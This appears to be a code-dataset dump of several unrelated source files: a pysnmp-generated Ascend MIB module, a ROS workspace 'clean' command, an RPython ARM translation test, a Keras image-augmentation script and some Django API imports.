systemProfile_AutoLogout = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-AutoLogout").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_AutoLogout.setStatus('mandatory')
systemProfile_IdleLogout = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 17), Integer32()).setLabel("systemProfile-IdleLogout").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_IdleLogout.setStatus('mandatory')
systemProfile_P50SwitchUsage = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("switchUnused", 1), ("switchSerialWan", 2), ("switchNumberOfUses", 3)))).setLabel("systemProfile-P50SwitchUsage").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_P50SwitchUsage.setStatus('mandatory')
systemProfile_oDS0MinRst = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 19), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("daily", 2), ("monthly", 3)))).setLabel("systemProfile-oDS0MinRst").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_oDS0MinRst.setStatus('mandatory')
systemProfile_MaxSystemDS0Mins = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 20), Integer32()).setLabel("systemProfile-MaxSystemDS0Mins").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_MaxSystemDS0Mins.setStatus('mandatory')
systemProfile_MaxDialoutTime = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 21), Integer32()).setLabel("systemProfile-MaxDialoutTime").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_MaxDialoutTime.setStatus('mandatory')
systemProfile_ParallelDialing = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 22), Integer32()).setLabel("systemProfile-ParallelDialing").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ParallelDialing.setStatus('mandatory')
systemProfile_SingleFileIncoming = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 23), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-SingleFileIncoming").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SingleFileIncoming.setStatus('mandatory')
systemProfile_DelayDualPortDialing = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 24), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-DelayDualPortDialing").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_DelayDualPortDialing.setStatus('mandatory')
systemProfile_EditNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 25), DisplayString()).setLabel("systemProfile-EditNumber").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_EditNumber.setStatus('mandatory')
systemProfile_AnalogEncoding = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 26), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("uLaw", 1), ("aLaw", 2)))).setLabel("systemProfile-AnalogEncoding").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_AnalogEncoding.setStatus('mandatory')
systemProfile_SessionidBase = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 27), Integer32()).setLabel("systemProfile-SessionidBase").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SessionidBase.setStatus('mandatory')
systemProfile_TOnline = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 28), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-TOnline").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_TOnline.setStatus('mandatory')
systemProfile_TOnlineMostAvailChan = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 29), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-TOnlineMostAvailChan").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_TOnlineMostAvailChan.setStatus('mandatory')
systemProfile_T302Timer = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 30), Integer32()).setLabel("systemProfile-T302Timer").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_T302Timer.setStatus('mandatory')
systemProfile_CallRoutingSortMethod = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 31), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("itemFirst", 1), ("slotFirst", 2)))).setLabel("systemProfile-CallRoutingSortMethod").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_CallRoutingSortMethod.setStatus('mandatory')
systemProfile_DigitalCallRoutingSortMethod = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 32), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("itemFirst", 1), ("slotFirst", 2)))).setLabel("systemProfile-DigitalCallRoutingSortMethod").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_DigitalCallRoutingSortMethod.setStatus('mandatory')
systemProfile_ExactMatchCallRouting = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 33), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-ExactMatchCallRouting").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ExactMatchCallRouting.setStatus('mandatory')
systemProfile_ShelfControllerType = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 34), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standalone", 1), ("master", 2), ("slave", 3)))).setLabel("systemProfile-ShelfControllerType").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ShelfControllerType.setStatus('mandatory')
systemProfile_MasterShelfController = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 35), Integer32()).setLabel("systemProfile-MasterShelfController").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_MasterShelfController.setStatus('mandatory')
systemProfile_NewNasPortIdFormat = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 36), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-NewNasPortIdFormat").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_NewNasPortIdFormat.setStatus('mandatory')
# NOTE: this column's sub-identifier (59) is out of sequence with its
# neighbors; the value comes from the generated MIB source, keep as-is.
systemProfile_NasPortFormat = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 59), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("notApplicable", 1), ("n-2455", 2), ("n-655", 3), ("n-122", 4), ("n-1233", 5)))).setLabel("systemProfile-NasPortFormat").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_NasPortFormat.setStatus('mandatory')
systemProfile_ModemPriTypeOfNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 37), Integer32()).setLabel("systemProfile-ModemPriTypeOfNumber").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ModemPriTypeOfNumber.setStatus('mandatory')
systemProfile_ModemPriNumberingPlanId = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 38), Integer32()).setLabel("systemProfile-ModemPriNumberingPlanId").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ModemPriNumberingPlanId.setStatus('mandatory')
systemProfile_WanInterface = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 39), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("wanT1", 1), ("wanSwan", 2)))).setLabel("systemProfile-WanInterface").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_WanInterface.setStatus('mandatory')
systemProfile_PermConnUpdMode = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 40), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("all", 1), ("changed", 2)))).setLabel("systemProfile-PermConnUpdMode").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_PermConnUpdMode.setStatus('mandatory')
systemProfile_UserstatFormat = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 41), DisplayString()).setLabel("systemProfile-UserstatFormat").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_UserstatFormat.setStatus('mandatory')
systemProfile_ControlBusType = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 42), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("dpram", 1), ("pbus", 2)))).setLabel("systemProfile-ControlBusType").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_ControlBusType.setStatus('mandatory')
systemProfile_BootSrVersion = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 43), DisplayString()).setLabel("systemProfile-BootSrVersion").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_BootSrVersion.setStatus('mandatory')
systemProfile_SysModemProfile_oATAnswerString = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 44), DisplayString()).setLabel("systemProfile-SysModemProfile-oATAnswerString").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SysModemProfile_oATAnswerString.setStatus('mandatory')
systemProfile_CallByCall = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 45), Integer32()).setLabel("systemProfile-CallByCall").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_CallByCall.setStatus('mandatory')
systemProfile_Country = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 46), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3, 4, 23, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22))).clone(namedValues=NamedValues(("argentina", 2), ("australia", 3), ("belgium", 4), ("brazil", 23), ("china", 5), ("costaRica", 6), ("finland", 7), ("france", 8), ("germany", 9), ("hongKong", 10), ("italy", 11), ("japan", 12), ("korea", 13), ("mexico", 14), ("netherlands", 15), ("newZealand", 16), ("singapore", 17), ("spain", 18), ("sweden", 19), ("switzerland", 20), ("uk", 21), ("us", 22)))).setLabel("systemProfile-Country").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Country.setStatus('mandatory')
systemProfile_PotsDigitTimeout = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 47), Integer32()).setLabel("systemProfile-PotsDigitTimeout").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_PotsDigitTimeout.setStatus('mandatory')
systemProfile_System8kClock = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 48), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3, 4, 5))).clone(namedValues=NamedValues(("controller", 2), ("limOrTrunkModule", 3), ("bits", 4), ("ami8k", 5)))).setLabel("systemProfile-System8kClock").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_System8kClock.setStatus('mandatory')
systemProfile_SupportDbcs = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 49), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-SupportDbcs").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_SupportDbcs.setStatus('mandatory')
systemProfile_IncCallDistrib = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 50), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3))).clone(namedValues=NamedValues(("firstAvailable", 2), ("fairShare", 3)))).setLabel("systemProfile-IncCallDistrib").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_IncCallDistrib.setStatus('mandatory')
systemProfile_IgnoreLineup = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 51), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-IgnoreLineup").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_IgnoreLineup.setStatus('mandatory')
# Read-only JAM file component names (sub-ids 53-58).
systemProfile_JamFileComponents_JamFile1 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 53), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile1").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile1.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile2 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 54), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile2").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile2.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile3 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 55), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile3").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile3.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile4 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 56), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile4").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile4.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile5 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 57), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile5").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile5.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile6 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 58), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile6").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile6.setStatus('mandatory')
# Row action column (sub-id 52): writing createProfile/deleteProfile
# creates or removes a profile row.
systemProfile_Action_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 52), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noAction", 1), ("createProfile", 2), ("deleteProfile", 3)))).setLabel("systemProfile-Action-o").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Action_o.setStatus('mandatory')
# Second table: per-profile status numbers, doubly indexed by
# systemProfile-StatusNumber-Index-o and systemProfile-StatusNumber-Index1-o.
mibsystemProfile_StatusNumberTable = MibTable((1, 3, 6, 1, 4, 1, 529, 23, 125, 2), ).setLabel("mibsystemProfile-StatusNumberTable")
if mibBuilder.loadTexts: mibsystemProfile_StatusNumberTable.setStatus('mandatory')
mibsystemProfile_StatusNumberEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1), ).setLabel("mibsystemProfile-StatusNumberEntry").setIndexNames((0, "ASCEND-MIBSYS1-MIB", "systemProfile-StatusNumber-Index-o"), (0, "ASCEND-MIBSYS1-MIB", "systemProfile-StatusNumber-Index1-o"))
if mibBuilder.loadTexts: mibsystemProfile_StatusNumberEntry.setStatus('mandatory')
systemProfile_StatusNumber_Index_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1, 1), Integer32()).setLabel("systemProfile-StatusNumber-Index-o").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_StatusNumber_Index_o.setStatus('mandatory')
systemProfile_StatusNumber_Index1_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1, 2), Integer32()).setLabel("systemProfile-StatusNumber-Index1-o").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_StatusNumber_Index1_o.setStatus('mandatory')
systemProfile_StatusNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1, 3), DisplayString()).setLabel("systemProfile-StatusNumber").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_StatusNumber.setStatus('mandatory')
# Export every defined object so that other MIB modules can import them by
# name from "ASCEND-MIBSYS1-MIB" via mibBuilder.importSymbols().
mibBuilder.exportSymbols("ASCEND-MIBSYS1-MIB", systemProfile_CallRoutingSortMethod=systemProfile_CallRoutingSortMethod, systemProfile_MasterShelfController=systemProfile_MasterShelfController, systemProfile_PotsDigitTimeout=systemProfile_PotsDigitTimeout, systemProfile_JamFileComponents_JamFile6=systemProfile_JamFileComponents_JamFile6, systemProfile_Index_o=systemProfile_Index_o, systemProfile_MaxDialoutTime=systemProfile_MaxDialoutTime, mibsystemProfileEntry=mibsystemProfileEntry, systemProfile_SessionidBase=systemProfile_SessionidBase, systemProfile_ExactMatchCallRouting=systemProfile_ExactMatchCallRouting, systemProfile_CallByCall=systemProfile_CallByCall, systemProfile_AutoLogout=systemProfile_AutoLogout, DisplayString=DisplayString, systemProfile_UserstatFormat=systemProfile_UserstatFormat, systemProfile_IdleLogout=systemProfile_IdleLogout, systemProfile_EditNumber=systemProfile_EditNumber, systemProfile_P50SwitchUsage=systemProfile_P50SwitchUsage, systemProfile_DigitalCallRoutingSortMethod=systemProfile_DigitalCallRoutingSortMethod, systemProfile_JamFileComponents_JamFile1=systemProfile_JamFileComponents_JamFile1, systemProfile_IncCallDistrib=systemProfile_IncCallDistrib, mibsystemProfile_StatusNumberTable=mibsystemProfile_StatusNumberTable, systemProfile_ParallelDialing=systemProfile_ParallelDialing, systemProfile_SystemRmtMgmt=systemProfile_SystemRmtMgmt, systemProfile_AnalogEncoding=systemProfile_AnalogEncoding, systemProfile_ControlBusType=systemProfile_ControlBusType, systemProfile_Name=systemProfile_Name, systemProfile_IgnoreLineup=systemProfile_IgnoreLineup, systemProfile_JamFileComponents_JamFile2=systemProfile_JamFileComponents_JamFile2, systemProfile_Console=systemProfile_Console, systemProfile_SubAddressMode=systemProfile_SubAddressMode, systemProfile_NumDigitsTrunkGroups=systemProfile_NumDigitsTrunkGroups, systemProfile_Contact=systemProfile_Contact, systemProfile_ModemPriNumberingPlanId=systemProfile_ModemPriNumberingPlanId, 
systemProfile_BootSrVersion=systemProfile_BootSrVersion, systemProfile_DmSubaddress=systemProfile_DmSubaddress, systemProfile_V110Subaddress=systemProfile_V110Subaddress, mibsystemProfileTable=mibsystemProfileTable, systemProfile_Location=systemProfile_Location, systemProfile_oDS0MinRst=systemProfile_oDS0MinRst, systemProfile_JamFileComponents_JamFile3=systemProfile_JamFileComponents_JamFile3, systemProfile_StatusNumber=systemProfile_StatusNumber, systemProfile_UseTrunkGroups=systemProfile_UseTrunkGroups, systemProfile_TermRate=systemProfile_TermRate, mibsystemProfile=mibsystemProfile, mibsystemProfile_StatusNumberEntry=mibsystemProfile_StatusNumberEntry, systemProfile_ShelfControllerType=systemProfile_ShelfControllerType, systemProfile_WanInterface=systemProfile_WanInterface, systemProfile_PermConnUpdMode=systemProfile_PermConnUpdMode, systemProfile_NasPortFormat=systemProfile_NasPortFormat, systemProfile_ModemPriTypeOfNumber=systemProfile_ModemPriTypeOfNumber, systemProfile_SupportDbcs=systemProfile_SupportDbcs, systemProfile_DelayDualPortDialing=systemProfile_DelayDualPortDialing, systemProfile_TOnline=systemProfile_TOnline, systemProfile_SerialSubaddress=systemProfile_SerialSubaddress, systemProfile_JamFileComponents_JamFile5=systemProfile_JamFileComponents_JamFile5, systemProfile_T302Timer=systemProfile_T302Timer, systemProfile_LanSubaddress=systemProfile_LanSubaddress, systemProfile_SingleFileIncoming=systemProfile_SingleFileIncoming, systemProfile_NewNasPortIdFormat=systemProfile_NewNasPortIdFormat, systemProfile_Country=systemProfile_Country, systemProfile_SysModemProfile_oATAnswerString=systemProfile_SysModemProfile_oATAnswerString, systemProfile_System8kClock=systemProfile_System8kClock, systemProfile_Action_o=systemProfile_Action_o, systemProfile_MaxSystemDS0Mins=systemProfile_MaxSystemDS0Mins, systemProfile_JamFileComponents_JamFile4=systemProfile_JamFileComponents_JamFile4, systemProfile_ConsoleSecurity=systemProfile_ConsoleSecurity, 
systemProfile_TOnlineMostAvailChan=systemProfile_TOnlineMostAvailChan, systemProfile_StatusNumber_Index_o=systemProfile_StatusNumber_Index_o, systemProfile_StatusNumber_Index1_o=systemProfile_StatusNumber_Index1_o)
| pysnmp/ASCEND-MIBSYS1-MIB.py | 26,681 | PySNMP MIB module ASCEND-MIBSYS1-MIB (http://snmplabs.com/pysmi) ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ASCEND-MIBSYS1-MIB Produced by pysmi-0.3.4 at Mon Apr 29 17:12:34 2019 On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) | 330 | en | 0.311998 |
# coding=utf-8
#
# ROSREPO
# Manage ROS workspaces with multiple Gitlab repositories
#
# Author: Timo Röhling
#
# Copyright 2016 Fraunhofer FKIE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
from .workspace import get_workspace_location, get_workspace_state, resolve_this, find_ros_root
from .config import Config
from .cache import Cache
from .ui import msg, warning, fatal, show_conflicts
from .util import call_process, PIPE
from .resolver import find_dependees
import os
# os.scandir() only exists on Python >= 3.5; on older interpreters fall back
# to the third-party 'scandir' backport package, which provides the same API.
try:
    from os import scandir
except ImportError:
    from scandir import scandir
def run(args):
    """Entry point for the ``rosrepo clean`` command.

    Determines which packages to clean (the packages of the current
    directory with ``--this``, vanished build folders with ``--vanished``,
    packages no longer part of any build job with ``--unused``, or
    everything when no selection is given) and delegates the actual
    removal to ``catkin clean``.

    :param args: parsed command line namespace; the attributes
        ``workspace``, ``this``, ``vanished``, ``unused``, ``offline``,
        ``dry_run`` and ``packages`` are used
    :return: exit code of the ``catkin clean`` subprocess (0 when there
        is nothing to clean)
    """
    wsdir = get_workspace_location(args.workspace)
    config = Config(wsdir)
    cache = Cache(wsdir)
    ros_rootdir = find_ros_root(config.get("ros_root", None))
    if ros_rootdir is None:
        fatal("cannot detect ROS distribution. Have you sourced your setup.bash?\n")
    if args.this:
        ws_state = _resolve_workspace_state(wsdir, config, cache, args)
        args.packages = resolve_this(wsdir, ws_state)
    elif args.vanished or args.unused:
        ws_state = _resolve_workspace_state(wsdir, config, cache, args)
        args.packages = []
        build_dir = os.path.join(wsdir, "build")
        # A freshly initialized workspace may not have a build folder yet;
        # treat that like an empty one instead of crashing in scandir().
        if os.path.isdir(build_dir):
            # vanished packages: build folders without a matching workspace package
            for d in scandir(build_dir):
                if d.is_dir() and d.name not in ws_state.ws_packages and not d.name == "catkin_tools_prebuild":
                    args.packages.append(d.name)
        if args.unused:
            depends, _, conflicts = find_dependees(config["pinned_build"] + config["default_build"], ws_state, ignore_missing=True)
            show_conflicts(conflicts)
            if conflicts:
                fatal("cannot resolve dependencies\n")
            # unused packages: in the workspace but not needed by any pinned
            # or default build job (only those that actually have build output)
            unused_packages = set(ws_state.ws_packages) - set(depends.keys())
            args.packages += [p for p in unused_packages if os.path.isdir(os.path.join(wsdir, "build", p))]
        if not args.packages:
            msg("Nothing to clean\n")
            return 0
    if not args.dry_run:
        # re-extend the workspace with the detected ROS root before cleaning
        invoke = ["catkin", "config", "--extend", ros_rootdir]
        call_process(invoke, stdout=PIPE, stderr=PIPE)
        config["last_ros_root"] = ros_rootdir
        config.write()
    catkin_clean = ["catkin", "clean", "--workspace", wsdir, "--yes"]
    if args.dry_run:
        catkin_clean.append("--dry-run")
    # without an explicit package selection, everything is cleaned
    catkin_clean += args.packages or ["--all"]
    return call_process(catkin_clean)


def _resolve_workspace_state(wsdir, config, cache, args):
    """Apply the configured offline mode to ``args`` (warning the user if it
    is active) and return the current workspace state."""
    if args.offline is None:
        args.offline = config.get("offline_mode", False)
    if args.offline:
        warning("offline mode. Run 'rosrepo config --online' to disable\n")
    return get_workspace_state(wsdir, config, cache, offline_mode=args.offline)
| src/rosrepo/cmd_clean.py | 3,278 | coding=utf-8 ROSREPO Manage ROS workspaces with multiple Gitlab repositories Author: Timo Röhling Copyright 2016 Fraunhofer FKIE Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | 650 | en | 0.83555 |
from rpython.jit.backend.llsupport.test.ztranslation_test import TranslationRemoveTypePtrTest
from rpython.translator.translator import TranslationContext
from rpython.config.translationoption import DEFL_GC
from rpython.jit.backend.arm.test.support import skip_unless_run_slow_tests
skip_unless_run_slow_tests()
class TestTranslationRemoveTypePtrARM(TranslationRemoveTypePtrTest):
    def _get_TranslationContext(self):
        """Build a TranslationContext configured for the gcremovetypeptr
        translation test (shadowstack root finder, default GC)."""
        ctx = TranslationContext()
        translation_cfg = ctx.config.translation
        translation_cfg.gc = DEFL_GC  # default GC, e.g. 'hybrid' or 'minimark'
        translation_cfg.gcrootfinder = 'shadowstack'
        translation_cfg.list_comprehension_operations = True
        translation_cfg.gcremovetypeptr = True
        return ctx
from data import *

# Data augmentation
# Deep learning needs plenty of training data; when the dataset is small,
# augmentation should be applied.  keras.preprocessing.image.ImageDataGenerator
# yields (data, label) batches and can augment on the fly (rotation, shift,
# rescale, ...) -- see https://keras.io/preprocessing/image/ for details.
# For image segmentation tasks the image and its mask must be transformed
# together.

# Augmentation parameters for the training generator.
# Use an empty dict (dict()) to disable augmentation entirely.
aug_params = dict(rotation_range=0.2,
                  width_shift_range=0.05,
                  height_shift_range=0.05,
                  shear_range=0.05,
                  zoom_range=0.05,
                  horizontal_flip=True,
                  fill_mode='nearest')

# save_to_dir makes the generator dump the transformed images so the
# augmentation result can be inspected visually.
train_gen = trainGenerator(20, '/data/s2732815/unet/data/train', 'image', 'label',
                           aug_params, save_to_dir = '/data/s2732815/unet/data/train/aug')

# Pull a few batches so the augmented images and their masks get written out.
num_batch = 3
batch_index = 0
for _batch in train_gen:
    batch_index += 1
    if batch_index > num_batch:
        break

# Creating .npy data:
# with enough memory, all images and masks can be cached into npy files and
# fed to the network directly:
# image_arr, mask_arr = geneTrainNpy("data/membrane/train/aug/", "data/membrane/train/aug/")
# np.save("data/image_arr.npy",image_arr)
# np.save("data/mask_arr.npy",mask_arr)
| dataPrepare.py | 1,917 | data augmentationIn deep learning tasks, a lot of data is need to train DNN model, when the dataset is not big enough, data augmentation should be applied.keras.preprocessing.image.ImageDataGenerator is a data generator, which can feed the DNN with data like : (data,label), it can also do data augmentation at the same time.It is very convenient for us to use keras.preprocessing.image.ImageDataGenerator to do data augmentation by implement image rotation, shift, rescale and so on... see [keras documentation](https://keras.io/preprocessing/image/) for detail.For image segmentation tasks, the image and mask must be transformed **together!!** define your data generator If you want to visualize your data augmentation result, set save_to_dir = your pathif you don't want to do data augmentation, set data_gen_args as an empty dict.data_gen_args = dict() visualize your data augmentation resultyou will see 60 transformed images and their masks in data/membrane/train/aug create .npy data If your computer has enough memory, you can create npy files containing all your images and masks, and feed your DNN with them. image_arr, mask_arr = geneTrainNpy("data/membrane/train/aug/", "data/membrane/train/aug/") np.save("data/image_arr.npy",image_arr) np.save("data/mask_arr.npy",mask_arr) | 1,288 | en | 0.714759 |
from copy import deepcopy
from simple_api.django_object.actions import DetailAction, ListAction, CreateAction, UpdateAction, DeleteAction
from simple_api.django_object.datatypes import create_associated_list_type
from simple_api.django_object.filters import generate_filters
from simple_api.django_object.converter import determine_simple_api_fields
from simple_api.django_object.utils import get_pk_field
